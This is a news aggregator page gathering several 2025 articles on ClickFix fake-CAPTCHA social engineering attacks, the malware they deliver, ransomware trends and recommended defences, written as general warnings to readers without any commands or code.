Latest news with #ClickFix
Techday NZ
3 days ago
- Techday NZ
ReliaQuest report exposes rise of social engineering cyber threats
ReliaQuest has released its latest quarterly report, outlining identified trends in cyber attacker techniques, malware use, and ransomware group activity observed between March and May 2025 across its customer base. ClickFix and social engineering tactics One of the most notable trends identified in the report is the widespread use of ClickFix, a social engineering method that misleads users into pasting malicious commands into tools such as PowerShell or the Windows Run prompt. Attackers disguise these actions as solutions to false issues, such as fake CAPTCHAs or Windows updates, enabling them to circumvent defences and introduce malware with comparative ease. This approach has facilitated the increased use of malware families such as Lumma and SectopRAT, both of which utilise trusted tools like MSHTA to deliver malicious payloads. The report notes that social engineering has significantly contributed to the rise of these attack vectors, stating, "Social engineering played a pivotal role in the success of these top tactics." Lateral movement and initial access trends Phishing-based techniques accounted for over half of observed initial access incidents among customers, while drive-by compromise incidents rose by 10% compared to the previous period. The report sees a shift, as attackers increasingly rely on user manipulation rather than exploiting technical vulnerabilities. ReliaQuest's analysis highlights the prominence of remote desktop protocol (RDP) over internal spear phishing as a method of lateral movement within networks. This shift is closely associated with attackers impersonating IT helpdesks to persuade users to install RDP tools. The report finds, "The shift away from tactics like internal spearphishing suggests attackers are favouring techniques that require less user interaction and offer more direct access to internal systems." Additionally, drive-by downloads powered by campaigns such as ClickFix and widely available phishing kits continue to lower the threshold for cybercriminal activity. External remote resources dropped from third to fourth place among initial access vectors, further illustrating the focus on exploiting human factors. MSHTA on the rise for defence evasion MSHTA (Microsoft HTML Application Host), a native Windows binary, was reported to be involved in 33% of defence evasion incidents during the period, up from just 3.1% the previous year. Attackers use this legitimate tool to bypass conventional security tools by convincing users to execute malicious commands themselves, often delivered through social engineering campaigns such as ClearFake. "ClearFake's early adoption of ClickFix techniques propelled MSHTA from 16th to second place among defence evasion tactics. Recently, other ClickFix adopters have fuelled MSHTA's current surge, leveraging broader social engineering tactics to bypass defences more effectively," the report details. Changes in ransomware operations The report notes significant changes among ransomware groups, with the closure of "RansomHub" leading many affiliates to migrate to other groups, notably Qilin, which saw a 148% increase in activity. Play and Safepay also reported increased activity of 116% and 266%, respectively. The number of active ransomware groups has dropped by nearly 30%, but newer or established ransomware-as-a-service (RaaS) platforms have absorbed most of these affiliates, raising concerns over increasingly professionalised threats. "With major ransomware groups like RansomHub gone, RaaS operators are vying to capitalise on the influx of affiliates searching for new platforms. To attract this talent, we'll likely see RaaS platforms introduce innovative capabilities or revise profit-sharing models. This competition is expected to create a more fragmented yet increasingly sophisticated ransomware ecosystem, posing even greater challenges for defenders." Impact on industry sectors The construction industry was the only sector to see an increase in ransomware attack victims, rising by 15%. ReliaQuest attributes this to opportunistic targeting as attackers seek out industries with perceived weaker defences. The report notes, "Construction organisations may feel compelled to pay ransoms quickly to avoid costly downtime and operational delays, making them attractive targets." By contrast, the retail sector saw a 62% decrease in victims, attributed to a drop in activity from the "CL0P" ransomware Cleo campaign. Malware trends and threat actor activity The period saw increased activity by the SectopRAT malware, delivered via ClickFix and malvertising campaigns. Despite infrastructure takedowns in May 2025, Lumma infostealer operations continue, with new logs advertised on cybercriminal forums and marketplaces. "Although Lumma's activity is likely to decline over the coming months as the impact of the takedown continues to unfold, it's likely the group could regain traction over time. As attention around the takedown diminishes, attackers may return to this familiar and well-established tool," the report comments. Emergence of Scattered Spider Scattered Spider, after a five-month hiatus, returned in April 2025 with attacks on UK retail organisations. The group is identified for using detailed social engineering against high-value individuals such as CFOs and utilising both on-premises methods and cloud techniques for stealth and control. "Scattered Spider's success lies in its ability to combine social engineering precision, persistence in cloud environments, and on-premises technical expertise. These TTPs allow the group to achieve initial access, maintain control, and operate stealthily, making it difficult for organizations to detect and remediate the group's activity in the early stages of an attack." Recommendations and defensive measures ReliaQuest's report makes several recommendations for organisations, including disabling Windows Run for non-administrative users, enforcing control over RDP tool installations, implementing web filtering, and prioritising user training against social engineering. Additional measures include strengthening identity verification, enabling advanced monitoring, and conducting regular risk assessments, particularly for privileged user accounts. Looking ahead, the report anticipates broader adoption of ClickFix among ransomware affiliates, increased sophistication by groups such as Scattered Spider, and the continued rise of infostealer malware like Acreed. The report concludes by emphasising the need for proactive investment in advanced detection, user education, and securing of both cloud and traditional infrastructure to counter an upward trend in attack complexity and evasion tactics.
Forbes
5 days ago
- Forbes
Your Passwords Are At Risk — New Windows XFiles Attack Confirmed
Windows passwords come under attack from XFiles threat. Two things that are guaranteed to strike fear into the hearts of anyone concerned about cybersecurity attacks are Windows and passwords. Combine the two, and you have the basis of what can be something of a security nightmare. With Microsoft account password spraying attacks and warnings over opening specific Outlook files in the news as Windows email, passwords and 2FA codes come under attack, this is kind of understandable. Now, with confirmation of a password-stealing threat called XFiles, is there even more cause for concern? The truth, as they say, is out there. A group of self-proclaimed elite threat hunters and cyber analysts has issued a warning that attackers deploying a malware payload called Xfiles, also known as DeerStealer, are targeting Windows users in order to compromise passwords that can then be sold on dark web criminal marketplaces. A June 12 report published by the eSentire Threat Response Unit has revealed how, throughout May, threats actors have been using the XFiles payload in order to steal Windows passwords that can then be sold by a dark web user known only as LuciferXfiles. The methods employed are sadly all too familiar, involving ClickFix attacks during the initial access process. These tech support scams combine seemingly genuine offers of help regarding security issues surrounding account activity with fake ID Captcha prompts that involve executing malicious commands using the Windows Run prompt. Should the victim get to this stage, they will then download something called HijackLoader, often obfuscated using an encrypted PNG image, that downloads the real payload, the XFiles infostealer malware to compromise passwords, browser 2FA session cookies, instant messages and more. Read the full report for a detailed technical analysis of the entire attack chain. When it comes to mitigation, however, the eSentire TRU advice is clear: I would have to add to this that opening the Windows Run prompt and pasting the clipboard's content, which is how ClickFix attacks work, is hardly conducive to good security practice or, frankly, common sense. I mean, how many Captcha or I Am Not A Robot tests have ever asked you to do that? The answer is zero. Protect your passwords by not being tricked into doing something that is so obviously out of the ordinary.
Techday NZ
09-06-2025
- Business
- Techday NZ
ClickFix phishing surge spoofs Booking.com to target hotels
Research from Cofense Intelligence has identified a series of phishing campaigns targeting hotel chains in the accommodation and food services sector. These campaigns have been ongoing since November 2024, with a significant increase observed in March 2025, accounting for 47% of the total campaign volume. The phishing emails impersonate directing recipients to a fake CAPTCHA website that prompts them to run a malicious script. This method of malware delivery, known as a ClickFix attack, is designed to convince users to execute scripts which install remote access trojans (RATs) or information-stealing malware. ClickFix attacks are distinguished by their use of fake CAPTCHA screens that convincingly mimic brands such as and Cloudflare. When users interact with these fake verifications, they are instructed to carry out steps, such as using Windows keyboard shortcuts, to inadvertently run a malicious script. This script is commonly delivered through users' clipboards, typically triggered by a specific button on the fraudulent site. Analysis from Cofense Intelligence shows that 75% of campaigns using fake CAPTCHAs employed spoofing templates, while other less frequent variants mimic Cloudflare Turnstile CAPTCHAs and cookie consent banners. Among these, 64% delivered RATs, 47% information stealers, and 11% were observed distributing both types of malware. This campaign has been increasing in popularity since November 2024, with 47% of total campaign volume being from March 2025 alone. 75% of all active threat reports (ATRs) with fake CAPTCHAs used ClickFix templates. Other notable but rare ClickFix templates include Cloudflare Turnstile-spoofing and cookie consent banner-styled templates. 64% of campaign ATRs delivered RATs, 47% of campaign ATRs delivered information stealers, and 11% of campaign ATRs were seen delivering both RATs and information stealers. 53% of all campaign ATRs deliver XWorm RAT, making it the most popular RAT used in these campaigns. Pure Logs Stealer (19% of ATRs) and DanaBot (14% of ATRs) are the most popular information stealers for these campaigns. The most commonly observed malware is the XWorm RAT, present in 53% of the analysed campaigns. Other malware includes Pure Logs Stealer and DanaBot, making up 19% and 14% of cases, respectively. The content and tone of the phishing emails have evolved since the campaign's inception. Earlier messages featured generic or vague language, whereas more recent examples exploit concerns over guest satisfaction and incorporate references to specific guest reservations. These tactics are designed to elicit a response and drive the recipient to interact with malicious links. Some emails specify that the link will only function on Windows, and the recipients who access the site on other operating systems receive a message indicating this limitation. The malicious scripts are typically delivered as PowerShell commands or Microsoft HTML applications, which, once executed, can install RATs or steal data from victim devices. ClickFix is described as a technique for persuading victims to run malicious Windows scripts themselves, often by pasting code into the Windows Run command prompt. Sometimes, these scripts are obfuscated to appear as verification codes, increasing the likelihood that the user will not recognise them as harmful. In addition to fraudulent CAPTCHA screens, recent campaigns include cookie consent banners that prompt users to run malicious scripts under the pretext of accepting cookies.
Forbes
04-06-2025
- Business
- Forbes
This Dangerous Email Tricks You Into Hacking Your Own PC
Do not be tricked into hacking your own PC. getty Take a walk through any major tourist city in the world, and eventually you will see them. On a bridge or promenade or in a park. Someone sitting with three plastic cups and a bunch of onlookers, watching as someone is scammed. Everyone knows it's a scam. It doesn't matter that you've watched as the marble is placed under a cup, keeping an eagle eye on it as the three cups are swapped around. The marble has moved and you cannot win. You know you should know better. So it is with the so-called ClickFix lures currently hacking PCs around the world. The leading example of the new wave of 'scam yourself' attacks, you know you should know better. But the cleverness of the hook, the trickery of the scammer still works. As McAfee explains, ClickFix attacks 'begin with users being lured to visit seemingly legitimate but compromised websites. Upon visiting, victims are redirected to domains hosting fake popup windows that instruct them to paste a script into a PowerShell terminal.' In reality, this 'sophisticated form of social engineering, leveraging the appearance of authenticity' just 'manipulates users into executing malicious scripts.' The email lure. Cofense A new warning from Cofense has just outed one of the most devious lures I've seen recently. It's a nasty attack that plays on the human emotions and fears of the victim being scammed, so much so that they don't see the attack coming. But they should. The dangerous email lure is sent to businesses in the travel industry, purporting to be from market giant warning that a customer has made a serious complaint and giving the recipient a time-boxed opportunity to respond using the link provided. This click launches ClickFix Cofense 'While the exact email structure varies from sample to sample,' Cofense says, 'these campaigns generally provide emails with embedded links to a ClickFix fake CAPTCHA site which is used to deliver a malicious script that runs RATs and/or information stealers.' The campaign 'preys on the recipient's fear of leaving a guest dissatisfied' and might 'claim that a guest was trying to contact the hotel but was unable to get a response.' Cofense provides one such example, which is 'particularly notable for mentioning potential reputational damage and giving a strict 24-hour deadline for compliance.' ClickFix attack. Cofense Not all these attacks are negative, some suggest requests or questions from future (imaginary) guests, while also providing a link for the hotel operator to respond. 'The emails used in these campaigns will sometimes state that the embedded link only works on Windows computers,' simply because this malware only infects Windows PCs. But despite the lure, the attack is the same as all the others. In this case it's a CAPTCHA 'Robot or Human?" challenge, which instructs the user to open a Windows prompt and paste in the text on the PC's clipboard, and then press Enter. Absent a few wording changes, there is no variation in this part of the attack. It's the most blatant tell. Cofense says some of the latest attacks used Cloudflare CAPTCHAs while others used brand instead. The instructions, though, are all the same. Once you know about ClickFix, in theory at least you can't be fooled. But the cybercriminals will try nonetheless, and the attacks are flying, so it's working. Don't be fooled. Never paste in copied text and hit Enter in this way. Whether it's a CAPTCHA, a secure website or document restriction, or a technical fault, it's always an attack. And the hacker is always you.
Yahoo
03-06-2025
- General
- Yahoo
Devious new ClickFix malware variant targets macOS, Android, and iOS using browser-based redirections
When you buy through links on our articles, Future and its syndication partners may earn a commission. Security researchers found ClickFix attacks evolving to target other operating systems On Android and iOS, the attack is particularly worrisome, as it transforms into a drive-by attack The malware is already being flagged by antivirus programs ClickFix, an infamous hacking technique that tricks people into running malware thinking they're fixing a problem on their computer, has evolved, experts have warned. New research from c/side has revealed what used to be a Windows-only attack method is now capable of targeting macOS, iOS and Android devices, as well. In a blog post analyzing the evolution, the researchers said the new attack starts with a compromised website. The threat actors would inject JavaScript code which redirected users to a new browser tab when they clicked on certain elements on the page. The new tab then displays a page that looks like a legitimate URL shortener, with a message to copy and paste a link into the browser - and doing so triggers yet another redirect, this time to a download page. Here is where the technique diverges, depending on the operating system of the victim. On macOS, the attack leads to a terminal command that fetches and executes a malicious shell script, already flagged by multiple antivirus programs. On Android and iOS, things are even worse, since the attack no longer requires any user interaction. 'When we tested this on Android and iOS, we expected a ClickFix variant. But instead, we encountered a drive-by attack,' the researchers explained. 'A drive-by attack is a type of cyberattack where malicious code is executed or downloaded onto a device simply by visiting a compromised or malicious webpage. No clicks, installs, or interaction required.' In this case, the site downloads a .TAR archive file, holding malware. This one, too, was flagged by at least five antivirus programs already. 'This is a fascinating and evolving attack that demonstrates how attackers are expanding their reach,' c/side explained. 'What started as a Windows-specific ClickFix campaign is now targeting macOS, Android, and iOS, significantly expanding the scale of the operation.' New ClickFix campaign spotted hitting both Windows and Linux machines Take a look at our guide to the best authenticator app We've rounded up the best password managers
